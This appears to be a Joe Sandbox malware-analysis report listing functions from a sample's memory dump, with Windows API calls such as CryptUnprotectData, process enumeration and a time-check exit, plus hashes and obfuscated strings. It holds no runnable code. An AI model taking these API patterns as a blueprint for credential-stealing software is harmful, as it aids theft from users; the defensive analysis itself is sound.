                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: c079b24890c483120b347e4d738d8d4ba26ab6db31ede421f3a634878d42c9fc
                          • Instruction ID: 3f732ae6ec78358692111cf0f23ea8ad629565133b3c8a28cf53c121e2046cef
                          • Opcode Fuzzy Hash: c079b24890c483120b347e4d738d8d4ba26ab6db31ede421f3a634878d42c9fc
                          • Instruction Fuzzy Hash: C2412FB990421ADFDB10DF94DD89BEEB7B8FB48704F1045A8E609A7280D7B15A84CF91
                          Function 00136920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0013696C
                          • sscanf.NTDLL ref: 00136999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001369B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001369C0
                          • ExitProcess.KERNEL32 ref: 001369DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: d60cccd9c2144e3fe9e997b84254e0b2a2617d100dffcd8be17a4234283f1b1e
                          • Instruction ID: 362fc58acba6113489f9a8793d8a2b8a493f7c72814477dc0c0a0d98de1b6306
                          • Opcode Fuzzy Hash: d60cccd9c2144e3fe9e997b84254e0b2a2617d100dffcd8be17a4234283f1b1e
                          • Instruction Fuzzy Hash: 0821E9B5D00208AFCF05EFE4D945AEEBBB9BF48300F04856AE406F3250EB745604CBA9
                          Function 00127240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0012724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00127254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00127281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001272A4
                          • LocalFree.KERNEL32(?), ref: 001272AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 681203c498063b16d3d3cc00c0f024780ed2603c00896c7955e9ebd8d61fa440
                          • Instruction ID: 5847988b458b6ae84ee6490667c59c53c6e4e8377666f5356d05359ae0decdfb
                          • Opcode Fuzzy Hash: 681203c498063b16d3d3cc00c0f024780ed2603c00896c7955e9ebd8d61fa440
                          • Instruction Fuzzy Hash: AF011275A44208BBDB14DFD4DD45F9E7BB8EB44704F108158FB05BB2C0D7B0AA008B65
                          Function 00139600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0013961E
                          • Process32First.KERNEL32(00140ACA,00000128), ref: 00139632
                          • Process32Next.KERNEL32(00140ACA,00000128), ref: 00139647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0013965C
                          • CloseHandle.KERNEL32(00140ACA), ref: 0013967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: 88122ffbb3d4b0d7bf453696e55ea41f6c4b77d61003ccdcc813b9386d627c4c
                          • Instruction ID: 3edae1e8f62b6e73cc3241cfb8baffce8ae030b9dd094dcc89063519ea017851
                          • Opcode Fuzzy Hash: 88122ffbb3d4b0d7bf453696e55ea41f6c4b77d61003ccdcc813b9386d627c4c
                          • Instruction Fuzzy Hash: E9011EB5A01208EBCB15DFA5CD49BEDBBF8EB48300F108188E909A7250E7B4AB40DF51
                          Function 004F7413 Relevance: 6.6, Strings: 4, Instructions: 1589COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '5~w$B>$\Zt$`I%
                          • API String ID: 0-2711800056
                          • Opcode ID: 67fc0c344a1dbe8e6ca7a1da2753367dfefd181898764127c1493b907b4c8667
                          • Instruction ID: 4b581b72842d59218ee1b182d71ecd874290f5e5f23246d5df35e08ded04ebe7
                          • Opcode Fuzzy Hash: 67fc0c344a1dbe8e6ca7a1da2753367dfefd181898764127c1493b907b4c8667
                          • Instruction Fuzzy Hash: C6B205F360C2009FE704AE29EC8567ABBE6EF94720F16893DE6C5C3744EA3558058697
                          Function 004EEF2D Relevance: 6.6, Strings: 4, Instructions: 1557COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: L6V$!8~$8So_${:/g
                          • API String ID: 0-2454544636
                          • Opcode ID: b385c68f1b234b6f715867db2a6870bfd3e46f12fc7c122a10cf608cd13ae974
                          • Instruction ID: 057452e07ad86fc1c4a97cf14ecbdcc355cad29e5b964f35856eb4633d600f20
                          • Opcode Fuzzy Hash: b385c68f1b234b6f715867db2a6870bfd3e46f12fc7c122a10cf608cd13ae974
                          • Instruction Fuzzy Hash: 80A229F360C2149FE308AE2DEC8577AB7E9EF94320F1A853DE6C5C3744EA3558058696
                          Function 004ED3A9 Relevance: 6.5, Strings: 4, Instructions: 1523COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <Ky$Z@n}$t`>9${>A(
                          • API String ID: 0-2201754280
                          • Opcode ID: 0b0cd1929b1e12e4a33be3ff3a4e16cbe2e16b1a1db05965ec6491e2b00303f2
                          • Instruction ID: a055b9889c8517b813b9322625d9ed34cffcf1e3eb18ad137ffd1bb40f007fbc
                          • Opcode Fuzzy Hash: 0b0cd1929b1e12e4a33be3ff3a4e16cbe2e16b1a1db05965ec6491e2b00303f2
                          • Instruction Fuzzy Hash: A3A2F5F36082009FE7046E2DEC8567ABBE9EF94720F1A493DEAC5C7744E63598048797
                          Function 00138EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,00125184,40000001,00000000,00000000,?,00125184), ref: 00138EC0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: 82b0d5485494e6a6cc2e784371c42da060a7a89b35c8e596adaf56307e6babd8
                          • Instruction ID: 7a21b8ce29f47e9c068e362a5d468760735ccacea5f86b5f6aa31d0ebbe5e4da
                          • Opcode Fuzzy Hash: 82b0d5485494e6a6cc2e784371c42da060a7a89b35c8e596adaf56307e6babd8
                          • Instruction Fuzzy Hash: AA11E274200309BFDB04CFA4E889FAB37AEAF89714F109558F9198B250DB76ED41DB60
                          Function 00129AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129AEF
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00124EEE,00000000,?), ref: 00129B01
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00124EEE,00000000,00000000), ref: 00129B2A
                          • LocalFree.KERNEL32(?,?,?,?,00124EEE,00000000,?), ref: 00129B3F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 31e1e5215006a41b034c6a192635eb2be9acf8aa2e31febbe45b411cdda9331c
                          • Instruction ID: 67ed3dafb67d0a7fedddcb1e82be47ae590effd6e0680059dc5d6bfbb7d2511b
                          • Opcode Fuzzy Hash: 31e1e5215006a41b034c6a192635eb2be9acf8aa2e31febbe45b411cdda9331c
                          • Instruction Fuzzy Hash: 1111A4B4240208AFEB11CF64DC95FAA77B9FB89700F208058F9159B390C7B5A901DB90
                          Function 00137A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00F0F1B8,00000000,?,00140E10,00000000,?,00000000,00000000), ref: 00137A63
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00137A6A
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00F0F1B8,00000000,?,00140E10,00000000,?,00000000,00000000,?), ref: 00137A7D
                          • wsprintfA.USER32 ref: 00137AB7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                          • String ID:
                          • API String ID: 3317088062-0
                          • Opcode ID: 07dbd31f6fe09f204cf9fabaa7cb539cf27b7649d478801fb2e43ac2c60c1f38
                          • Instruction ID: fc0b8ddb439fc33d1b45ecd01425a5b76859a9b5b7cb31ea09802831848f10bc
                          • Opcode Fuzzy Hash: 07dbd31f6fe09f204cf9fabaa7cb539cf27b7649d478801fb2e43ac2c60c1f38
                          • Instruction Fuzzy Hash: 8A118EB1945618EBEB208B54DC49FA9BBB8FB04721F10479AE90AA32C0C7741A40CF51
                          Function 004FA99C Relevance: 5.5, Strings: 3, Instructions: 1705COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: [J[w$o#.$}
                          • API String ID: 0-2732673298
                          • Opcode ID: 2adce1a88e54d793f6cd1c324935ee82c461fbc6fc3b60fe00478ad6bb5e68d1
                          • Instruction ID: 0159a9dbfe687bd634776e6dc96b5368855ee8353b8be4565497c65e2c708400
                          • Opcode Fuzzy Hash: 2adce1a88e54d793f6cd1c324935ee82c461fbc6fc3b60fe00478ad6bb5e68d1
                          • Instruction Fuzzy Hash: 58B218F3A0C6049FE304AE2DEC8566BBBE9EF94720F16493DE6C5C7744E63598018693
                          Function 004E6797 Relevance: 5.3, Strings: 3, Instructions: 1596COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
